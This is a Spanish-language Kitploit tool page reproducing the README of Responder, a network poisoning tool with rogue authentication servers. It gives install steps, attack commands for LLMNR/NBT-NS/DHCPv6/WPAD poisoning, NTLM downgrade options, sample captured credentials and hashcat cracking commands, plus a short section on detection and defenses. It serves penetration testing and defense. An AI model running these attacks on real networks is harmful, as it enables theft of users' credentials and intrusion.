Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Responder — Responder es un envenenador de LLMNR, NBT-NS y MDNS, con un servidor de autenticación rogue incorporado para HTTP/SMB/MSSQL/FTP/LDAP que soporta NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP y autenticación HTTP Basic. | Kitploit
Herramientas/GitHubGitHub/lgandx/responder
Descifrado de ContraseñasReconocimientoEnumeración de DNS y SubdominiosExplotaciónRecopilación de InformaciónSeguridad de RedesPruebas de PenetraciónAutenticaciónFuzzing de DNSRed TeamingAnálisis de DNS
6.5k867hace 2 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
lgandx/responder

Responder

Responder es un envenenador de LLMNR, NBT-NS y MDNS, con un servidor de autenticación rogue incorporado para HTTP/SMB/MSSQL/FTP/LDAP que soporta NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP y autenticación HTTP Basic.

Ver Repositorio

Responder

Python Version License

Responder es un envenenador de LLMNR, NBT-NS y MDNS con servidores de autenticación falsos incorporados para HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS y más. Soporta NTLMv1/NTLMv2/LMv2, NTLMSSP de seguridad extendida y varios métodos de autenticación en más de 15 protocolos.


Tabla de Contenidos

  • Resumen
  • Novedades
  • Instalación
  • Inicio Rápido
  • Envenenamiento de Red
  • Servidores Falsos
  • Configuración
  • macOS
  • Solución de Problemas

Resumen

Responder captura credenciales respondiendo a solicitudes de resolución de nombres LLMNR, NBT-NS y MDNS. Cuando un cliente intenta resolver un nombre de host inexistente, Responder responde, dirigiendo al cliente a la máquina del atacante donde múltiples servidores de autenticación falsos capturan las credenciales. También se incluyen servidores falsos DHCP y DHCPv6, que se pueden habilitar por separado.

Datos Capturados:

  • Hashes NetNTLMv1/v2 - Descifrables con hashcat/john
  • Hashes Kerberos AS-REQ - Descifrado offline (hashcat -m 7500)
  • Credenciales en texto claro - HTTP Basic, FTP, SMTP, IMAP, LDAP, SQL, etc.
  • Challenge-response - CRAM-MD5, DIGEST-MD5

Novedades

Esta versión incluye:

Mejoras en DHCPv6 y DNS

  • ✅ DHCPv6 INFORMATION-REQUEST - Compatibilidad total con Windows 10/11
  • ✅ Filtrado de Dominios - Apuntar a dominios específicos (DHCPv6 y DNS)
  • ✅ Anuncios de Router - Envenenamiento opcional de red IPv6

Actualizaciones del Servidor de Correo

  • ✅ SMTP STARTTLS - Captura desde clientes de correo modernos
  • ✅ IMAP STARTTLS - Puerto 143 con actualización a TLS
  • ✅ IMAPS - SSL nativo en puerto 993
  • ✅ POP3 mejorado - Mejor compatibilidad

Mejoras en Kerberos

  • ✅ Forzar AS-REQ - Forzar autenticación Kerberos.
  • ✅ Intentar retroceso a NTLM - Después de capturar la autenticación Kerberos, devolver KDC_ERR_ETYPE_NOSUPP

Mejoras de Protocolo

  • ✅ MSSQL - Captura de autenticación de SQL Server
  • ✅ LDAP/LDAPS - Credenciales de servicios de directorio
  • ✅ RDP - Autenticación de Escritorio Remoto
  • ✅ WinRM - Administración Remota de Windows
  • ✅ DCERPC - Autenticación RPC de Windows

Instalación

Requisitos

  • Python 2.7 o Python 3.x
  • Linux (recomendado Ubuntu, Kali, Debian)
  • Privilegios de root

Dependencias del Sistema```bash

sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces

root@kitploit:~
### Instalar Responder```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

Verificar instalación```bash

sudo python3 Responder.py --help

root@kitploit:~
---

## Inicio rápido

### Envenenamiento básico```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

DHCPv6 Ataque```bash

Edit Responder.conf first:

[DHCPv6 Server]

DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

root@kitploit:~
### Forzar autenticación básica HTTP```bash
sudo python3 Responder.py -I eth0 -b -v

Habilitar Autenticación de Proxy + Rogue DHCP```bash

Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)

sudo python3 Responder.py -I eth0 -Pvd

root@kitploit:~
---

## Envenenamiento de red

### Envenenamiento LLMNR/NBT-NS/MDNS

**Propósito:** Responder a fallos de resolución de nombres

**Cómo funciona:**
1. El cliente difunde una consulta para un host inexistente
2. Responder responde: "Soy ese host"
3. El cliente se conecta al atacante
4. Credenciales capturadas

**Configuración:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

Uso:```bash sudo python3 Responder.py -I eth0 -v

root@kitploit:~
---

### Servidor DHCPv6

**Propósito:** Forzar a los clientes a usar el DNS del atacante a través de IPv6

**Características:**
- ✅ Soporte de INFORMATION-REQUEST (Windows 10/11)
- ✅ Soporte de SOLICIT/REQUEST
- ✅ Filtrado de dominios (segmentación quirúrgica)
- ✅ Router Advertisement (opcional)

**Cómo funciona:**
1. Windows envía INFORMATION-REQUEST, SOLICIT, REQUEST de DHCPv6
2. Responder responde: DNS = IPv6 del atacante
3. Windows prioriza el DNS IPv6
4. Todas las consultas DNS → atacante
5. Envenenamiento de DNS → captura de credenciales

**Configuración:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

Uso:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v

root@kitploit:~
**Salida esperada:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123

Servidores Rogue

Responder incluye 17+ servidores de autenticación rogue:

Servicios de archivos y red

Servidor SMB (Puertos 445, 139)

Propósito: Capturar hashes NetNTLM de recursos compartidos de archivos

Características:

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ Captura de hashes NetNTLMv1/v2
  • ✅ Seguridad extendida NTLMSSP
  • ✅ Firma de sesión deshabilitada (permite relay)

Disparadores:```powershell

UNC paths

\attacker-ip\share \non-existent-server\files

NET USE commands

net use \attacker-ip\share

Windows Explorer address bar

\attacker-ip\

root@kitploit:~
**Formato Capturado:**```
username::domain:challenge:response:blob

Cracking:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

root@kitploit:~
**Configuración:**```ini
[Responder Core]
SMB = On

Servidor FTP (Puerto 21)

Propósito: Capturar credenciales FTP en texto claro

Características:

  • ✅ Honeypot de inicio de sesión anónimo
  • ✅ Autenticación USER/PASS
  • ✅ Captura de credenciales en texto claro

Disparadores:```bash ftp attacker-ip

Username: anything

Password: anything

root@kitploit:~
**Formato capturado:**```
[FTP] Cleartext: username:password

Configuración:```ini [Responder Core] FTP = On

root@kitploit:~
---

### Servidores de Bases de Datos

#### MSSQL Server (Puerto 1433)

**Propósito:** Capturar autenticación de Microsoft SQL Server

**Características:**
- ✅ Autenticación de SQL Server
- ✅ Autenticación de Windows (NTLM)
- ✅ Credenciales SQL en texto claro
- ✅ Captura de hash NetNTLMv2

**Desencadenantes:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

Formatos capturados:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

root@kitploit:~
**Configuración:**```ini
[Responder Core]
SQL = On

Notas:

  • Captura tanto la autenticación SQL como la autenticación de Windows
  • Funciona con conexiones SSMS, sqlcmd, ADO.NET
  • Puede capturar credenciales de dominio mediante autenticación de Windows

Servidores de Correo Electrónico

Servidor SMTP (Puerto 25, 587)

Propósito: Capturar autenticación de clientes de correo electrónico

Características:

  • ✅ soporte STARTTLS (clientes modernos)
  • ✅ AUTH PLAIN (texto claro)
  • ✅ AUTH LOGIN (texto claro)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM (NetNTLMv2)

Flujo STARTTLS:``` Client → EHLO Server → 250-STARTTLS Client → STARTTLS Server → 220 Ready to start TLS [TLS handshake using self-signed cert] Client → AUTH PLAIN Server → Captured! ✅

root@kitploit:~
**Disparadores:**```
Email client configuration:
- Server: attacker-ip
- Port: 25 or 587
- Security: STARTTLS or None
- Username: anything
- Password: anything

Formatos capturados:``` [SMTP] LOGIN: [email protected]:Password123 [SMTP] NetNTLMv2: user::DOMAIN:challenge:response:blob [SMTP] CRAM-MD5: user:challenge:response

root@kitploit:~
**Configuración:**```ini
[Responder Core]
SMTP = On

Advertencias de certificado: Las advertencias de certificados autofirmados son normales. Los clientes rechazan el primer intento, reintentan y tienen éxito. Las credenciales aún se capturan.


Servidor IMAP (Puerto 143)

Propósito: Capturar autenticación IMAP con STARTTLS

Características:

  • ✅ Soporte STARTTLS
  • ✅ Comando LOGIN (cleartext)
  • ✅ AUTHENTICATE PLAIN
  • ✅ AUTHENTICATE LOGIN
  • ✅ AUTHENTICATE NTLM

Flujo STARTTLS:``` Client → CAPABILITY Server → * CAPABILITY IMAP4 AUTH=PLAIN AUTH=NTLM STARTTLS Client → STARTTLS Server → OK Begin TLS negotiation now [TLS upgrade] Client → LOGIN user password Server → Captured! ✅

root@kitploit:~
**Configuración:**```ini
[Responder Core]
IMAP = On

Servidor IMAPS (Puerto 993)

Propósito: IMAP sobre SSL (cifrado nativo)

Características:

  • ✅ SSL nativo desde el inicio de la conexión
  • ✅ Todos los métodos de autenticación IMAP
  • ✅ No se necesita STARTTLS (ya está cifrado)

Cómo se diferencia de IMAP:``` Port 143 (IMAP): Plain → STARTTLS → Encrypted Port 993 (IMAPS): Encrypted from start

root@kitploit:~
**Configuración:**```ini
[Responder Core]
IMAPS = On

Servidor POP3 (Puerto 110)

Propósito: Capturar credenciales de recuperación de correo POP3

Características:

  • ✅ Autenticación USER/PASS
  • ✅ APOP (desafío MD5)
  • ✅ Captura de credenciales en texto claro

Disparadores:``` Email client:

  • Protocol: POP3
  • Server: attacker-ip
  • Port: 110
root@kitploit:~
**Formato capturado:**```
[POP3] USER: username
[POP3] PASS: password

Configuración:```ini [Responder Core] POP = On

root@kitploit:~
---

### Servidores Web

#### Servidor HTTP (Puerto 80)

**Propósito:** Capturar autenticación web

**Características:**
- ✅ Autenticación NTLM (NetNTLMv1/v2)
- ✅ Autenticación básica (texto claro)
- ✅ Autenticación Digest (MD5)
- ✅ Inyección WPAD

**Disparadores:**```
Browser: http://attacker-ip/
UNC: file://attacker-ip/share
WPAD: Automatic proxy detection

Forzar autenticación básica:```bash sudo python3 Responder.py -I eth0 -b

root@kitploit:~
**Formatos Capturados:**```
[HTTP] NTLM NTLMv2: user::DOMAIN:challenge:response:blob
[HTTP] Basic: user:password
[HTTP] Digest: user:realm:hash

Configuración:```ini [Responder Core] HTTP = On

root@kitploit:~
#### Servidor HTTPS (Puerto 443)

**Propósito:** Captura de autenticación HTTPS

**Características:**
- ✅ Cifrado SSL/TLS
- ✅ Todos los métodos de autenticación HTTP
- ✅ Certificado autofirmado
- ✅ WPAD sobre HTTPS

**Configuración:**```ini
[Responder Core]
HTTPS = On
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

Directorio y Autenticación

Servidor Kerberos (Puerto 88)

Propósito: Capturar hashes AS-REP para descifrado offline

Características:

  • ✅ AES256-CTS-HMAC-SHA1-96 (etype 18)
  • ✅ AES128-CTS-HMAC-SHA1-96 (etype 17)
  • ✅ ARCFOUR-HMAC-MD5 (etype 23)

Cómo funciona:

  1. El cliente envía AS-REQ (solicitud TGT)
  2. Responder: "Se requiere pre-autenticación"
  3. El cliente envía AS-REQ con marca de tiempo cifrada
  4. Responder captura la marca de tiempo cifrada
  5. Descifrar offline con hashcat

Descifrado:```bash hashcat -m 7500 kerberos-asreq.txt wordlist.txt

root@kitploit:~
**Configuración:**```ini
[Responder Core]
Kerberos = On

Servidor LDAP (Puerto 389)

Propósito: Capturar autenticación del directorio LDAP

Características:

  • ✅ Autenticación simple (texto claro)
  • ✅ Autenticación NTLM
  • ✅ Consultas de Active Directory

Disparadores:```bash

LDAP query

ldapsearch -H ldap://attacker-ip -D "CN=user,DC=corp,DC=local" -w password

Active Directory tools

dsquery user -d attacker-ip

root@kitploit:~
**Formatos capturados:**```
[LDAP] Simple: CN=user,DC=corp,DC=local:password
[LDAP] NetNTLMv2: user::DOMAIN:challenge:response:blob

Configuración:```ini [Responder Core] LDAP = On

root@kitploit:~
---

#### Servidor LDAPS (Puerto 636)

**Propósito:** LDAP sobre SSL

**Características:**
- ✅ Cifrado SSL/TLS
- ✅ Todos los métodos de autenticación LDAP

**Configuración:**```ini
[Responder Core]
LDAP = On

Acceso Remoto

RDP Server (Port 3389)

Propósito: Capturar autenticación de Remote Desktop

Características:

  • ✅ Autenticación a nivel de red (NLA)
  • ✅ Captura de hash NetNTLMv2
  • ✅ Autenticación CredSSP

Desencadenantes:``` Remote Desktop Client:

  • Computer: attacker-ip
  • Username: anything
  • Password: anything
root@kitploit:~
**Formato capturado:**```
[RDP] NetNTLMv2: user::DOMAIN:challenge:response:blob

Configuración:```ini [Responder Core] RDP = On

root@kitploit:~
**Nota:** Captura autenticación NLA antes de la sesión de escritorio.

---

#### WinRM Server (Puertos 5985, 5986)

**Propósito:** Capturar credenciales de Windows Remote Management

**Características:**
- ✅ HTTP (5985) y HTTPS (5986)
- ✅ Autenticación básica
- ✅ Autenticación NTLM
- ✅ Autenticación Kerberos

**Activadores:**```powershell
# PowerShell remoting
Enter-PSSession -ComputerName attacker-ip
Invoke-Command -ComputerName attacker-ip -ScriptBlock { whoami }

# WinRM command line
winrm invoke -remote:http://attacker-ip

Formatos capturados:``` [WinRM] Basic: DOMAIN\user:password [WinRM] NetNTLMv2: user::DOMAIN:challenge:response:blob

root@kitploit:~
**Configuración:**```ini
[Responder Core]
WINRM = On

Infraestructura

Servidor DNS (Puerto 53 TCP/UDP)

Propósito: DNS falso con filtrado de dominios

Características:

  • ✅ Envenenamiento de registros A/AAAA
  • ✅ Envenenamiento de registros MX (redirección de correo electrónico)
  • ✅ Registros SOA (parece autoritativo)
  • ✅ Registros SRV (Kerberos, LDAP)
  • ✅ Registros SVCB/HTTPS (navegadores modernos)
  • ✅ Soporte EDNS0
  • ✅ Filtrado de dominios

Configuración:```ini [DHCPv6 Server] ; DNS uses same domain filter as DHCPv6 DHCPv6_Domain = corp.local

root@kitploit:~
**Cómo funciona:**```
Query: mail.corp.local
Response: 192.168.1.100 (attacker)
Client connects to attacker's SMTP
Credentials captured!

Tipos de Registro Compatibles:

  • A (IPv4) - Redirigir al atacante
  • AAAA (IPv6) - Redirigir al atacante
  • MX (Correo) - Envenenamiento del servidor de correo
  • SRV (Servicios) - Kerberos, LDAP, etc.
  • SOA (Autoridad) - Aparecer como autoritativo
  • TXT (Texto) - Registros SPF
  • SVCB/HTTPS (Vinculación de Servicio) - Navegadores modernos

Ejemplo de Filtrado de Dominio:``` DHCPv6_Domain = corp.local

mail.corp.local → POISONED ✅ dc01.corp.local → POISONED ✅ google.com → IGNORED (normal DNS)

root@kitploit:~
**Configuración:**```ini
[Responder Core]
DNS = On

Servidor DCERPC (Puerto 135)

Propósito: Capturar autenticación RPC de Windows

Características:

  • ✅ Autenticación NTLM
  • ✅ Enumeración de servicios de Windows
  • ✅ Captura de NetNTLMv2

Disparadores:``` Windows services querying RPC endpoint mapper WMI queries Remote registry access

root@kitploit:~
**Formato capturado:**```
[DCERPC] NetNTLMv2: user::DOMAIN:challenge:response:blob

Configuración:```ini [Responder Core] DCERPC = On

root@kitploit:~
## Configuración

### Archivo de configuración principal

Edite `Responder.conf`:```ini
[Responder Core]
; === Network Services ===
SQL = On        # MSSQL (port 1433)
SMB = On        # SMB (ports 445, 139)
RDP = On        # Remote Desktop (port 3389)
Kerberos = On   # Kerberos (port 88)
FTP = On        # FTP (port 21)
POP = On        # POP3 (port 110)
SMTP = On       # SMTP with STARTTLS (port 25/587)
IMAP = On       # IMAP with STARTTLS (port 143)
IMAPS = On      # IMAPS with SSL (port 993)
HTTP = On       # HTTP (port 80)
HTTPS = On      # HTTPS (port 443)
DNS = On        # DNS (port 53)
LDAP = On       # LDAP/LDAPS (ports 389/636)
DCERPC = On     # Windows RPC (port 135)
WINRM = On      # Windows Remote Management (ports 5985/5986)

; === Poisoners ===
LLMNR = On      # Link-Local Multicast Name Resolution
NBTNS = On      # NetBIOS Name Service
MDNS = On       # Multicast DNS
DHCP = Off      # DHCP (IPv4) - use with caution
DHCPv6 = On     # DHCPv6 (IPv6) - use with more caution

; === Settings ===
SessionLog = On
LogToFile = On
Verbose = Yes
Database = Responder.db

; === SSL Certificates ===
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

[HTTP Server]
HtmlFilename = files/AccessDenied.html

[DHCPv6 Server]
; Target specific domain 
DHCPv6_Domain = corp.local

; Send Router Advertisements (use with caution)
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

Opciones de línea de comandos

Uso básico```bash

sudo python3 Responder.py [options]

root@kitploit:~
### Argumentos requeridos

| Opción | Descripción |
|--------|-------------|
| `-I eth0, --interface=eth0` | Interfaz de red a utilizar (use 'ALL' para todas las interfaces) |

### Opciones de envenenamiento

| Opción | Descripción |
|--------|-------------|
| `-A, --analyze` | Modo de análisis - Ver solicitudes NBT-NS, MDNS, LLMNR sin responder |
| `-w, --wpad` | Iniciar servidor proxy malicioso WPAD (predeterminado: Desactivado) |
| `-F, --ForceWpadAuth` | Forzar autenticación NTLM/Basic en la recuperación de wpad.dat (redes antiguas)|
| `-P, --ProxyAuth` | Forzar autenticación NTLM/Basic para el proxy (altamente efectivo) |

### Opciones de DHCP/DHCPv6

| Opción | Descripción |
|--------|-------------|
| `-d, --DHCP` | Habilitar respuestas DHCP broadcast con inyección WPAD (IPv4) |
| `-D, --DHCP-DNS` | Inyectar servidor DNS en la respuesta DHCP en lugar de WPAD |
| `--dhcpv6` | Habilitar envenenamiento DHCPv6 (responde a mensajes SOLICIT) |

### Opciones de envenenamiento IP

| Opción | Descripción |
|--------|-------------|
| `-e 10.0.0.22, --externalip=10.0.0.22` | Envenenar solicitudes con otra dirección IPv4 |
| `-6 ADDR, --externalip6=ADDR` | Envenenar solicitudes con otra dirección IPv6 |
| `-i 10.0.0.21, --ip=10.0.0.21` | IP local a usar (solo macOS) |

### Opciones de autenticación

| Opción | Descripción |
|--------|-------------|
| `-b, --basic` | Devolver autenticación HTTP Basic (predeterminado: NTLM) |
| `--lm` | Forzar degradación de hash LM (Windows XP/2003) |
| `--disable-ess` | Forzar degradación NTLMSSP de Seguridad Extendida |

### Opciones avanzadas

| Opción | Descripción |
|--------|-------------|
| `-u HOST:PORT, --upstream-proxy=HOST:PORT` | Proxy HTTP ascendente para WPAD malicioso |
| `-t 1e, --ttl=1e` | Cambiar TTL de Windows para respuestas envenenadas (hex: 30s=1e, o 'random') |
| `-N NAME, --AnswerName=NAME` | Nombre canónico para respuestas LLMNR (útil para relay Kerberos) |
| `-E, --ErrorCode` | Devolver STATUS_LOGON_FAILURE (habilita captura de autenticación WebDAV) |

### Opciones de salida

| Opción | Descripción |
|--------|-------------|
| `-v, --verbose` | Aumentar verbosidad (recomendado) |
| `-Q, --quiet` | Modo silencioso - Deshabilitar salida del envenenador |

### Información

| Opción | Descripción |
|--------|-------------|
| `--version` | Mostrar la versión del programa y salir |
| `-h, --help` | Mostrar mensaje de ayuda y salir |

---

### Ubicaciones de almacenamiento```
Responder.db                    # SQLite database
logs/
├── HTTP-NTLMv2-<IP>.txt       # HTTP NetNTLMv2 hashes
├── SMB-NTLMv2-<IP>.txt        # SMB NetNTLMv2 hashes
├── MSSQL-NTLMv2-<IP>.txt      # MSSQL NetNTLMv2 hashes
├── Kerberos-AES-<IP>.txt      # Kerberos AS-REP hashes
├── SMTP-Cleartext-<IP>.txt    # SMTP cleartext credentials
├── IMAP-NTLMv2-<IP>.txt       # IMAP NetNTLMv2 hashes
├── FTP-Cleartext-<IP>.txt     # FTP cleartext credentials
├── LDAP-Cleartext-<IP>.txt    # LDAP cleartext credentials
├── RDP-NTLMv2-<IP>.txt        # RDP NetNTLMv2 hashes
└── WinRM-NTLMv2-<IP>.txt      # WinRM NetNTLMv2 hashes

Consulta de base de datos```bash

sqlite3 Responder.db

Show tables

.tables

Show all captured hashes

SELECT * FROM hashes;

Export to CSV

.mode csv .output hashes.csv SELECT * FROM hashes; .quit

root@kitploit:~
---

### Consideraciones de OpSec

**Indicadores de detección:**
- Respuestas inusuales de LLMNR/NBT-NS
- Servidor DHCP/DHCPv6 no autorizado
- Solicitudes de preautenticación Kerberos inválidas
- Certificados SSL autofirmados
- Múltiples fallos de autenticación
- Respuestas DNS sospechosas

**Medidas defensivas:**
- Deshabilitar MDNS/LLMNR/NBT-NS a través de GPO
- Habilitar DHCP snooping en el switch
- Habilitar protección contra RA IPv6
- Habilitar protección contra DHCPv6
- Monitorear servidores DHCPv6 no autorizados

---

## macOS

Responder funciona en macOS pero requiere el indicador `-i` para especificar su dirección IP local. macOS no soporta la opción de socket `SO_BINDTODEVICE` utilizada en Linux para el enlace de interfaz.

### Uso del script lanzador

El script incluido `macOS_Launcher.sh` maneja los conflictos de servicios automáticamente:```bash
sudo ./macOS_Launcher.sh -I en0

The launcher will:

  • Detectar automáticamente tu IP desde la interfaz (o pasa -i para sobrescribir)
  • Verificar el estado de SIP e informar limitaciones
  • Detener servicios conflictivos de macOS (Kerberos, mDNSResponder, SMB, NetBIOS) si SIP está deshabilitado
  • Reportar conflictos de puertos si SIP está habilitado
  • Restaurar todos los servicios detenidos cuando Responder finalice (incluso con Ctrl+C)

Ejecución Directa```bash

Find your IP

ipconfig getifaddr en0

Run with explicit IP

sudo python3 Responder.py -I en0 -i 192.168.1.100

root@kitploit:~
### Protección de Integridad del Sistema (SIP)

Con SIP habilitado (por defecto), macOS impide detener servicios del sistema que se enlazan a puertos que Responder necesita. Tienes tres opciones:

1. **Usar el script lanzador** — reportará conflictos y continuará con lo disponible
2. **Deshabilitar módulos conflictivos** en `Responder.conf` (ej., `SMB = Off`, `DNS = Off`)
3. **Deshabilitar SIP** para obtener funcionalidad completa (consulta la [documentación de Apple](https://developer.apple.com/documentation/security/disabling-and-enabling-system-integrity-protection))

---

## Solución de problemas

### Problemas comunes

**Permiso denegado:**```bash
sudo python3 Responder.py -I eth0

Interfaz no encontrada:```bash ip link show sudo python3 Responder.py -I wlan0

root@kitploit:~
**Puerto ya en uso:**```bash
sudo netstat -tulpn | grep 445
sudo systemctl stop smbd nmbd

DHCPv6 No funciona:```bash

Enable IPv6

sudo sysctl -w net.ipv6.conf.all.disable_ipv6=0

Verify

sysctl net.ipv6.conf.all.disable_ipv6

root@kitploit:~
**No se capturaron hashes:**```bash
# Verify servers running
sudo python3 Responder.py -I eth0 -v

# Check firewall
sudo iptables -L

# Monitor traffic
sudo tcpdump -i eth0 port 445 or port 88 or port 389

Modo de depuración```bash

Very verbose output

sudo python3 Responder.py -I eth0 -vv

Tail logs

tail -f logs/Responder-Session.log

Network monitoring

sudo tcpdump -i eth0 -w responder-capture.pcap

root@kitploit:~
---

## Créditos

**Autor:** Laurent Gaffié
- GitHub: https://github.com/lgandx
- Sitio web: https://secorizon.com/
- Twitter: @secorizon

---

## Donación
Puedes contribuir a este proyecto donando a la siguiente dirección USDT o Bitcoin:

USDT: 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A

BTC: bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

Paypal:

https://paypal.me/PythonResponder

---

## Agradecimientos
El desarrollo de Late Responder ha sido posible gracias a las donaciones recibidas de individuos y empresas.

Queremos agradecer a los principales patrocinadores:

SecureWorks: https://www.secureworks.com/

Synacktiv: https://www.synacktiv.com/

Black Hills Information Security: http://www.blackhillsinfosec.com/

TrustedSec: https://www.trustedsec.com/

Red Siege Information Security: https://www.redsiege.com/

Open-Sec: http://www.open-sec.com/

Y a todos, TODOS los pentesters de todo el mundo que donaron a este proyecto.

Gracias.
Descargar herramienta